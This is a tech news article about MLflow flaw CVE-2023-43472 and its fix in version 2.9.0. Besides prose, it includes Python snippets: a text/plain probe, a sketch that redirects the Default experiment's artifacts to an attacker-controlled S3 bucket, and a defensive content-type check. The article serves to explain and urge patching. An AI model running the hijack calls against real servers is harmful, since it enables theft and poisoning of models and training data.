
New MLflow Update Prevents Theft and Poisoning of Machine Learning Models

A critical flaw in MLflow (CVE-2023-43472) let attackers steal or tamper with machine learning training data. By redirecting that data to servers under their control, they could also "poison" models.


A significant security flaw in MLflow, the widely used open-source machine learning lifecycle platform, has been addressed, making it essential for users to upgrade to the latest version. The vulnerability, identified as CVE-2023-43472, permitted unauthorized individuals to steal or tamper with sensitive machine learning training data. An attack could occur if a developer visited a malicious external website from the same machine running MLflow. The patch for this flaw is included in MLflow version 2.9.0.
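For readers who want to confirm that their own installation already carries the fix, a short Python check like the one below compares the locally installed MLflow version against 2.9.0. The use of the packaging helper library is an assumption for illustration, not something mandated by MLflow.

```python
# Minimal sketch: verify the installed MLflow version includes the fix
# described above (shipped in 2.9.0). Assumes the "packaging" helper
# library is available; it commonly ships alongside pip/setuptools.
from importlib.metadata import version
from packaging.version import Version

installed = Version(version("mlflow"))
if installed < Version("2.9.0"):
    print(f"MLflow {installed} predates the CVE-2023-43472 fix - upgrade to 2.9.0 or later")
else:
    print(f"MLflow {installed} includes the content-type fix")
```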

Understanding the Security Risk

By default, MLflow serves its user interface on the local machine (localhost) and exposes a REST API for programmatic interaction. Under normal circumstances, API calls are POST requests with the application/json content type. However, an investigation by Joseph Beeton, a senior application security researcher at Contrast Security, revealed that MLflow's API did not verify the content type of incoming requests. That left it open to text/plain requests sent by cross-origin JavaScript in a developer's browser, which do not trigger a CORS preflight check.
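To make the mechanics concrete, the sketch below reproduces the kind of request the API should have refused: a POST whose body is JSON but whose declared content type is text/plain. In a browser, such a request counts as "simple" and is sent cross-origin without a preflight; here it is issued from Python against a local tracking server purely for illustration. The endpoint path follows MLflow's public REST API, while the server address and experiment name are assumptions.

```python
# Illustrative probe (not Beeton's proof of concept): send a JSON-shaped body
# with a text/plain content type to the local MLflow REST API. A vulnerable
# (pre-2.9.0) server processes it anyway; a patched server should reject it.
import json
import requests

MLFLOW = "http://127.0.0.1:5000"  # MLflow's default local UI/API address

resp = requests.post(
    f"{MLFLOW}/api/2.0/mlflow/experiments/create",
    data=json.dumps({"name": "content-type-probe"}),
    headers={"Content-Type": "text/plain"},  # deliberately not application/json
)
print(resp.status_code, resp.text)
```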

An attacker could exploit this oversight to rename the “Default” experiment in MLflow and point new experiment data to an external server under the attacker's control. Such a breach would enable extraction of the trained machine learning model and its underlying data. More alarmingly, an adversary could manipulate the training process by introducing malicious data, resulting in a “poisoned” model that behaved unpredictably or in a manner beneficial to the attacker.
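The following hedged sketch outlines the two API calls such a hijack could chain together, based on the behavior described above. The experiment ID, storage URI, and payloads are illustrative assumptions rather than the published exploit; in the real scenario these requests would be fired as text/plain POSTs by cross-origin JavaScript in the developer's browser.

```python
# Hedged sketch of the hijack described above, expressed as direct calls to
# MLflow's documented REST endpoints. Values below are illustrative only.
import json
import requests

MLFLOW = "http://127.0.0.1:5000"
ATTACKER_STORE = "s3://attacker-controlled-bucket/artifacts"  # hypothetical

def plain_post(path: str, payload: dict) -> requests.Response:
    """POST JSON-shaped data declared as text/plain, as the exploit relied on."""
    return requests.post(
        f"{MLFLOW}{path}",
        data=json.dumps(payload),
        headers={"Content-Type": "text/plain"},
    )

# 1. Rename the built-in "Default" experiment (experiment ID 0) out of the way.
plain_post("/api/2.0/mlflow/experiments/update",
           {"experiment_id": "0", "new_name": "Default-renamed"})

# 2. Re-create "Default" with an artifact location the attacker controls, so
#    subsequent runs upload models and training artifacts to that server.
plain_post("/api/2.0/mlflow/experiments/create",
           {"name": "Default", "artifact_location": ATTACKER_STORE})
```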

Addressing the Exploit and Ensuring Best Practices

To close the security gap, the MLflow developers have added checks that validate the content type of incoming API requests, blocking unauthorized cross-origin requests. To guard against this and related threats, including potential remote code execution arising from similar weaknesses, developers are urged to update their MLflow installations to version 2.9.0 or later immediately.
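As an illustration of the kind of server-side check involved (not MLflow's actual patch), a Flask-style hook like the one below rejects API POSTs that do not declare application/json. Because text/plain no longer works, a malicious cross-origin page would need to pass a CORS preflight, which the browser will not grant for an arbitrary external site talking to localhost.

```python
# Illustrative Flask-style content-type check (not MLflow's actual patch):
# refuse API POSTs that are not declared as application/json.
from flask import Flask, abort, request

app = Flask(__name__)

@app.before_request
def require_json_content_type():
    if request.method == "POST" and request.path.startswith("/api/"):
        if not request.is_json:
            abort(415, description="Unsupported Media Type: expected application/json")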

Given the serious implications of such vulnerabilities for machine learning systems, which often form an integral part of business processes, maintaining robust security measures is paramount. Users are encouraged to consistently apply updates and patches to their software and stay informed about security best practices. Additionally, organizations deploying machine learning models should ensure that robust security policies are in place to protect against the theft or corruption of these highly valuable assets.

Luke Jones
Luke has been writing about all things tech for more than five years. He is following Microsoft closely to bring you the latest news about Windows, Office, Azure, Skype, HoloLens and all the rest of their products.
